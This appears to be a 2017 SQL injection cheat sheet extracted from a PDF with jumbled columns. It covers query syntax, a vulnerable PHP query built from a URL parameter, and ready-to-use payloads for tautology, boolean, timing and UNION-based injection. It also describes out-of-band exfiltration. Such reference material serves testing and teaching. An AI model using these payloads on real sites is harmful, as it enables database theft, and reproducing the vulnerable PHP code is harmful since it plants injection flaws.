SQL Injection Cheat Sheet

by binca via cheatography.com/44948/cs/13343/

Intro SQL Special Chatacters

Perhaps the most well known web app flaw '," String delimiter
Easier to address from an app security perspe​ctive, but remains a ; Terminates a SQL statements
common flaw. -- , # , /* Comment delimiters
Apps employ relational databases for a multitude of reasons %,* Wildcard characters
App interfaces to add, update and render data || , + , " " String concat​enation characters
Flaw originates from app allowing user-s​upplied input to be dynami​‐ +,<,>,= Mathem​atical operators
cally used in a SQL query
= Test for equiva​lence
Numerous different Relational Database Management Systems in
() Calling functions, sub-qu​eries, and INSERTs
use including Oracle, MySQL, MSSQL
%00 Null byte

Key SQL Verbs

SQL Injection Example Code
SELECT Retrieves data from tables, most commonly used
Server​-side PHP code taking the value of URL query parameter
INSERT Add data to table
name as input to SQL SELECT
UPDATE Modify existing data $ sql="SELECT * FROM Users WHERE lname=​'$_​GET​["na​‐
DELETE Delete data in a table me"]​';"
DROP Delete a table The resulting query if normal input is John
URL: http:/​/ur​l/s​qli.ph​p?n​ame​=John
UNION Combine data from multiple queries
SQL Query: SELECT * FROM Users WHERE lname=​'John';
Normal result.
SQL Query Modifiers
Injected Input Query
WHERE Filter SQL query to apply only when a condition is met
Input is John'
AND/OR* Combine WHERE to narrow SQL query URL: http:/​/ur​l/s​qli.ph​p?n​ame​=John'
LIMIT #1, Limits rows returned to #2, many rows starting at #1, SQL Query: SELECT * FROM Users WHERE lname=​'Jo​hn'';
#2 same results with LIMIT 2 OFFSET 1 Stray ' causes error.
Inject Input Query 2
ORDER Sort by column number
Input is John'; --
BY [#]
URL: http:/​/ur​l/s​qli.ph​p?n​ame​=Jo​hn';--
SQL Query: SELECT * FROM Users WHERE lname=​'Jo​hn'​;--';
Important SQL Data Types
Normal results.
bool Boolean True/False

int Integer ' or 1=1; --

char Fixed length string A payload or variation upon that is found in most SQLi docume​‐
varc​har Variable length string ntation
binary The single quote* closes out any string.

Note: Names for data types may vary across RDBMSs The 1=1 changes query logic because it is always true.
;-- Ends the payload completing the statement and comments out the
remaining code to prevent syntax errors

Note: Some RDBMS require a space after "​--" comment delimiter.

By binca Not published yet. Sponsored by Readable.com

cheatography.com/binca/ Last updated 9th November, 2017. Measure your website readability!
Page 1 of 3. https://readable.com
 SQL Injection Cheat Sheet
by binca via cheatography.com/44948/cs/13343/

SQLi Balancing Act Error Messages

Involves finding correct prefixes, payloads and suffixes to evoke Database Not only hint at the presence of SQLi but may guide us
desired behavior. Error in crafting input for exploi​tation. If you see database
Signif​icant aspect of discov​ering SQLi flaws is determ​ining reusable Messages error messages it is NOT blind SQLI
pieces of our injection. Custom Can require a different approach because the error will
Most obvious balancing act is quotes. Error not indicate if the input is being interp​reted.
Messages
The most common data type our input will land within are strings so
proper prefixes and suffixes to accomm​odate strings are necessary.
Equivalent String Injections
Example with comments: John';--
Prefix Suffix Note
SELECT...W​HERE lname=​'Jo​hn'​;--';
John' ;# Commenting
Example without comments: John' OR '1'='1 John' ;-- Commenting
SELECT...W​HERE lname=​'John' OR '1'='1'; Jo'/* */'hn Inline Commenting
Jo' 'hn Concat​enation (with or without spaces)
Balancing Column Numbers and Data Types
Jo'| |'hn Concat​enation
INSERT and UNION statement require us to know the number of
Comment delimiters (--, /**/, #) can allow injections to succeed that
columns required or used, otherwise a DB Syntax Error will occur
would otherwise fail.
INSERT and UNION statements also require the data type
The -- and # are useful SQL suffixes.
associated with the columns to be compat​ible.
Injecting into the middle of a SQL statem​ent​/query will not allow us to
ORDER BY [#] is another option where the number is increm​entally alter the rest of the SQL statement but it will show us if our input is
increased until an error is thrown. being interp​reted on the backend when we experience custome error
Note: Numbers and strings are typically compat​ible. messages (Blind SQLi).

Discovery of SQLi Binary​/Bo​olean Inference Testing

Input locations that levera​ge/​int​eract with backend DB such as login John' AND 1;# True
functi​ona​lity. John' AND 1=1;# True
HTTP Request portions that are common input locations: John' AND 0;# False
GET URL query parame​ters
John' AND 1=0;# False
POST payload
If it evaluates to True (AND 1=1) or False (AND 1=0)
HTTP COOKIE
Prefix: Dent' AND
HTTP User-a​gent
Evaluates: substr​((s​elect table_name from inform​ati​on_​sch​‐
HTTP COOKIE and User​-ag​ent are more likely to be blind.
ema.tables limit 1,),1,1) > "​a"
Suffix: ;#
Classes of SQLi

One vulner​ability encoun​tered in a variety of ways

Simplest catego​riz​ation is blind versus visible, but there is spectrum.
In-B​and​/Inline SQLi is a flaw that allows us to see the result of our
injection. They are easier to discover and exploit.
Blind SQLi is the same vulner​ability but with no visible response.

By binca Not published yet. Sponsored by Readable.com

cheatography.com/binca/ Last updated 9th November, 2017. Measure your website readability!
Page 2 of 3. https://readable.com
 SQL Injection Cheat Sheet
by binca via cheatography.com/44948/cs/13343/

Blind Timing Inferences

When there is no discer​nible output or errors the use of timing​-based

inference is a viable option.
Relies on respon​siv​eness of app for the inference by artifi​cially
inducing a delay when a condition evaluates.
Example:
Slee​p(10) - MySQL
WAITFOR DELAY '0:0:10' - MSSQL

Out-of​-Band SQLi

No errors messages
No visible responses
No boolea​n/i​nfe​rence opport​unities without or without timing
Requires an altern​ative commun​ication channel to discover or exploit
these flaws
Out-of​-Band Channels may provide for faster ex-fil​tration of some
flaws suscep​tible to inference techni​ques. Typically leverages HTTP
or DNS to tunnel commun​ica​tions back to attacker controlled server

Query Disclosure

UNION SELECT is used to disclose the vulnerable query we are

injecting into.
Payload:
John' UNION SELECT '1','2​','3', info FROM inform​ati​on_​sch​ema.pr​‐
oce​ssl​ist;#
Results:
SELECT * FROM Customers WHERE lname=​'John' UNION SELECT
'1','2​','3'', info FROM inform​ati​on_​sch​ema.pr​oce​ssl​ist;#'

By binca Not published yet. Sponsored by Readable.com

cheatography.com/binca/ Last updated 9th November, 2017. Measure your website readability!
Page 3 of 3. https://readable.com